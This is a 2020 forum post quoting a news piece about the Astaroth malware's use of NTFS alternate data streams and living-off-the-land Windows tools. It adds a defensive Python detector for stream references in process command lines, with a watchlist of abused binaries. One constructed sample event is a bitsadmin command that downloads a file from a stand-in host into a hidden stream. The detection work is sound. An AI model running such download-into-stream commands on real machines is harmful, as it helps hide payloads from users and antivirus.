03-26-2020, 10:38 PM
Quote: The notorious Windows malware Astaroth (aptly named after a demon baron of Hell found in occult cosmology) is back at it after several months of inactivity.
Microsoft exposed its tactics last year, but the annoying malware is even harder to catch this time around—thanks to the clever methods it uses to conceal itself among seemingly normal files.
Astaroth’s new tactics include using Alternate Data Stream (ADS) to slip malicious hardware into a downloading file without your browser, operating system, or antimalware software ever noticing.
Astaroth then uses legitimate Windows tools—such as ExtExport.exe, NirSoft MailPassView, BITSAdmin, and others—to execute its attacks.
It can use these tools to steal your email login credentials, send system information, and open your PC up to other forms of attack that can be extremely dangerous, but since these are legit tools, it will be hard—potentially impossible—for normal anti-virus software to block them.
Continue reading here:
https://lifehacker.com/how-to-avoid-the-...1842509944
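
A defender-side illustration of the point in the quote, added here and not taken from the linked article or from Microsoft's report: because the tools named are legitimate binaries, a detection has to key on how they are invoked, for example an argument that points into an NTFS alternate data stream (`file.ext:stream`). The event lines, the severity labels and the `triage` helper are constructed for this example; real process-creation logs will need their own field parsing.

```python
import re

# Binaries named in the quote; bitsadmin.exe is the file name of BITSAdmin.
WATCHED_TOOLS = {"extexport.exe", "bitsadmin.exe"}
# Zone.Identifier is the stream Windows writes on downloaded files (benign).
BENIGN_STREAMS = {"zone.identifier"}
# <file.ext>:<stream>[:$DATA], optionally after a drive prefix such as C:
ADS_REF = re.compile(
    r'(?:[A-Za-z]:)?[^":]*\.[A-Za-z0-9]{1,5}:([^":\\/]+)(?::\$DATA)?')

def triage(command_line):
    """Return a finding for a command line that references an ADS, else None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]
    if not tokens:
        return None
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    streams = []
    for token in tokens[1:]:
        if "://" in token:               # URLs contain ':' but are not streams
            continue
        match = ADS_REF.fullmatch(token)
        if match and match.group(1).lower() not in BENIGN_STREAMS:
            streams.append(token)
    if not streams:
        return None
    # Hypothetical scoring: a watched tool writing to a stream ranks highest.
    severity = "high" if image in WATCHED_TOOLS else "medium"
    return {"image": image, "severity": severity, "streams": streams}

# Constructed process-creation command lines (not from any real incident).
SAMPLE_EVENTS = [
    r'C:\Windows\System32\bitsadmin.exe /transfer job1 '
    r'https://example.test/a.gif C:\Users\Public\desktop.ini:a.gif',
    r'C:\Windows\System32\bitsadmin.exe /transfer job2 '
    r'https://example.test/b.zip C:\Users\Public\b.zip',
    r'C:\Windows\notepad.exe "C:\Users\Public\My Notes\todo.txt:draft"',
    r'C:\Windows\System32\cmd.exe /c dir C:\Users\Public',
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        finding = triage(event)
        if finding:
            print(finding["severity"], finding["image"], finding["streams"])
```

Only the first and third sample lines produce a finding; the second shows the same tool with an ordinary destination path, which is why the binary name alone is not a usable signal.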